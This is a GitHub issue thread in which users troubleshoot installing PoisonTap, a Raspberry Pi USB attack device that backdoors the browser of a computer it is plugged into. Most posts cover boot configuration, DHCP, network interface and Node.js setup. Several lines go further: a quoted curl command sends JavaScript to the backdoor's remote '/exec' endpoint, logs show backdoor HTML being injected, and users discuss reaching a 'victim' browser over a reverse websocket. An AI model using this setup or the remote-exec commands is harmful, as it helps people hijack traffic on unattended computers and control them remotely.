Installation - problems to get started about poisontap HOT 28 OPEN

Hmm, there may be some initial setup that I forgot to cover -- check the modular section here:
https://gist.github.com/gbaman/50b6cca61dd1c3f88f41

from poisontap.

@samyk And what is the dhcpd.conf configuration ? I tried but the adapter gives to the user a 169.254.X.X address automatically...

from poisontap.

I recommend splitting pi_startup.sh into a pi_config.sh and a bash script which is run on startup.
Also, you can add these lines to a config script to setup the pi as a usb gadget and install dependancies:

echo "dwc_otg.lpm_enable=0 console=serial0,115200 console=tty1 root=/dev/mmcblk0p2 rootfstype=ext4 elevator=deadline fsck.repair=yes rootwait modules-load=dwc2,g_ether" > /boot/cmdline.txt
echo "" >> /boot/config.txt
echo "dtoverlay=dwc2" >> /boot/config.txt
apt-get update && apt-get upgrade
apt-get install dsniff isc-dhcp-server nodejs screen

I'm unsure exactly which package you use for the dhcp server- apt-get installs udhcpd when trying to install dhcpd. Also, there is a package node as well as a package nodejs.

The main issue I'm facing is the dhcp server daemon fails to start-- obviously we listen for dhcp requests on usb0, but I haven't deduced the scope yet.

from poisontap.

@tomnick backend_server.js is a pretty simple script, if you read it you should be able to see how it works. I've not got anything open right now but I'm pretty sure you can just do a http request to:

yourserver.com:port/exec?your_code_here

See Samy's examples in the readme:

curl 'http://samy.pl:1337/exec?alert("muahahahaha")'

from poisontap.

Try: sudo npm -g install websocket

Also, make sure you're on Node v6.

from poisontap.

This is it...working...thanks a lot...

from poisontap.

Also, dsniff (which contains dnsspoof), screen, node.js, and dhcpd need to be installed (via apt-get should be fine)

from poisontap.

@jreziga Added dhcpd.conf in 838a035

from poisontap.

@tomnick With @ForeverRising's instructions and 838a035 do things work properly for you?

from poisontap.

I've also added some additional installation instructions in 26dd781

from poisontap.

There are still issues on my side.

(Auto-assigned IP)

(IP address and mask)

DHCP server can't start well

not much informations on log...

dhcpd.conf is the same you just provided

Still troubleshooting I'll post here if I find smthg

from poisontap.

Ah, also need to set the IP up:
echo -e "\nauto usb0\nallow-hotplug usb0\niface usb0 inet static\n\taddress 1.0.0.1\n\tnetmask 0.0.0.0" >> /etc/network/interfaces
Then reboot and test

from poisontap.

@samyk I was writing a post to ask your /etc/network/interfaces file, nice move ;)

Edit: Alright it worked !

from poisontap.

I used /etc/dhcpd.conf for the static IP. Does editing the interfaces file
work for you?

On Nov 18, 2016 3:45 PM, "jreziga" [email protected] wrote:

@samyk https://github.com/samyk I was writing a post to ask you your
/etc/network/interfaces file, nice move ;)

—
You are receiving this because you were mentioned.
Reply to this email directly, view it on GitHub
#19 (comment), or mute
the thread
https://github.com/notifications/unsubscribe-auth/AQOvAQZwFNniwEGJLDfyI20v0SzEOk6tks5q_iqKgaJpZM4K2qTF
.

from poisontap.

@ForeverRising dhcpd.conf goes inside /etc/dhcp/dhcpd.conf and not in /etc/dhcpd.conf

Plus you need to run echo -e "\nauto usb0\nallow-hotplug usb0\niface usb0 inet static\n\taddress 1.0.0.1\n\tnetmask 0.0.0.0" >> /etc/network/interfaces (try logged as root, I was unable to do this with that one line command using sudo)

And yes it worked.

@samyk I'm playing with it now. I'm still having some questions like :

• If the victim has on his browser "nfl.com" opened. Is it working directly when you plug the Rpi ? Or do the user need to refresh the page on his browser ? (It seems like the 1st scenario isn't working or am I doing smthg wrong ?).

Edit: Solved. No refresh needed just patience for this one :D (but still the reverse websocket issue :c )

Also I've setup my server with port 1337 wide open but I can't get any reverse websocket connection.
In the Rpi logs I see that backdoor.html is injected

>>> Inject Backdoor HTML reverse ws 1337
Request: 1.0.0.1.pin.ip.samy.pl/PoisonTap
{ host: '1.0.0.1.pin.ip.samy.pl',
  connection: 'keep-alive',
  'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36',
  accept: 'image/webp,image/*,*/*;q=0.8',
  'accept-encoding': 'gzip, deflate, sdch',
  'accept-language': 'fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4' }

But nothing on the node server console output

Edit: Solved. My bad "Remotely Accessible Web-Based Backdoors" is available only for CDN js files included in webpages

from poisontap.

I'll try again with a sudo su -. What does
ip a show with the static (set with the interfaces file)?

NFL.com seemed to reload every minute or so, I think it was chosen for the
example for this reason. I haven't looked at the source and meta tags for
the site though.

Also, I don't use newline characters in an echo command. Just habit for me.

On Nov 18, 2016 4:52 PM, "jreziga" [email protected] wrote:

@ForeverRising https://github.com/foreverrising dhcpd.conf goes inside
/etc/dhcp/dhcpd.conf and no /etc/dhcpd.conf

Plus you need to run echo -e "\nauto usb0\nallow-hotplug usb0\niface usb0
inet static\n\taddress 1.0.0.1\n\tnetmask 0.0.0.0" >>
/etc/network/interfaces (try logged as root, I was unable to do this with
this one line command with sudo)

And yes it worked.

@samyk https://github.com/samyk I'm playing with it now. I'm still
having some questions like :

• If the victime had on his browser "nfl.com" opened. Is it working
  directly when you plug the Rpi ? Or do the user need to refresh the page on
  his browser ? (It seems like the 1st scenario isn't working or am I doing
  smthg wrong ?)

I've setup my server with port 1337 wide open but I can't get any reverse
websocket connection.
In the Rpi logs I see that backdoor.html is injected

Inject Backdoor HTML reverse ws 1337
Request: 1.0.0.1.pin.ip.samy.pl/PoisonTap
{ host: '1.0.0.1.pin.ip.samy.pl',
connection: 'keep-alive',
'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36',
accept: 'image/webp,image/,/*;q=0.8',
'accept-encoding': 'gzip, deflate, sdch',
'accept-language': 'fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4' }

But nothing on the node server console output

—
You are receiving this because you were mentioned.
Reply to this email directly, view it on GitHub
#19 (comment), or mute
the thread
https://github.com/notifications/unsubscribe-auth/AQOvAbtBE4GV1iiV8xK7vK_wANFLs1H3ks5q_jpKgaJpZM4K2qTF
.

from poisontap.

@ForeverRising I've made a small installation guide. Check at the bottom of this page: https://github.com/jreziga/poisontap/blob/068c2836deb61b150946acf3395ccf11eb3b3ad1/README.md

from poisontap.

Alright, mine is running now like a charme... is there any instruction on how to use the tools like backend_server.js or how to access remotely etc?

from poisontap.

Also note the backdoor has jQuery built in so you have full access to jQuery functionality

from poisontap.

Which websocket library is the project based on?

from poisontap.

https://www.npmjs.com/package/websocket

from poisontap.

Getting this error on my server trying to install in the directory "poisontap" with the "backend_server.js" file included only:

npm

install websocket

[email protected] install /root/node_modules/websocket
(node-gyp rebuild 2> builderror.log) || (exit 0)

/root
├── [email protected]
└── [email protected]

npm WARN enoent ENOENT: no such file or directory, open '/root/package.json'
npm WARN root No description
npm WARN root No repository field.
npm WARN root No README data
npm WARN root No license field.

from poisontap.

Should add package npm to the apt-get line of the script and a npm -g
websocket line as well.

On Nov 20, 2016 12:45 PM, "tomnick" [email protected] wrote:

This is it...working...thanks a lot...

—
You are receiving this because you were mentioned.
Reply to this email directly, view it on GitHub
#19 (comment), or mute
the thread
https://github.com/notifications/unsubscribe-auth/AQOvARiTPz1ffgKDgTisFtpzr3tIu1rDks5rAJU5gaJpZM4K2qTF
.

from poisontap.

Worth noting that the ReadMe says that NodeJS may already be installed. Yes, it is, but a very old version (0.10.29??) so you need to install this v6.

First you need to remove all references to the current version 👍
sudo apt-get remove nodered -y
sudo apt-get remove nodejs nodejs-legacy -y
sudo apt-get remove npm -y

then:

wget https://nodejs.org/dist/latest-v6.x/node-v6.9.1-linux-armv6l.tar.gz
tar -xvf node-v6.9.1-linux-armv6l.tar.gz
cd node-v6.9.1-linux-armv6l
sudo cp -R * /usr/local/
sudo reboot

Now you have an updated version of Node that will run just fine.

from poisontap.

Did exact what you wrote and the results after reboot are:

node -v
The program 'node' is currently not installed. You can install it by typing:
apt install nodejs-legacy

So after I did intall nodejs-legacy:

node -v
v4.2.6

No v6!

from poisontap.

I've just reformatted so that it's obvious that each is a seperate command, can't just copy and paste the whole line...

Pretty sure you need v6 and up.

from poisontap.

Which directory to unpack the top Alexa?

from poisontap.

ln: failed to create symbolic link ‘configs/c.1/acm.usb0’: File exists
sh: echo: I/O error
sh: echo: I/O error
ln: failed to create symbolic link ‘configs/c.1/ecm.usb0’: File exists
ls: write error: Device or resource busy
ifup: interface usb0 already configured
SIOCADDRT: File exists
[ ok ] Starting isc-dhcp-server (via systemctl): isc-dhcp-server.service.
net.ipv4.ip_forward = 1

How do you solve this problem? Ask the great god for help

from poisontap.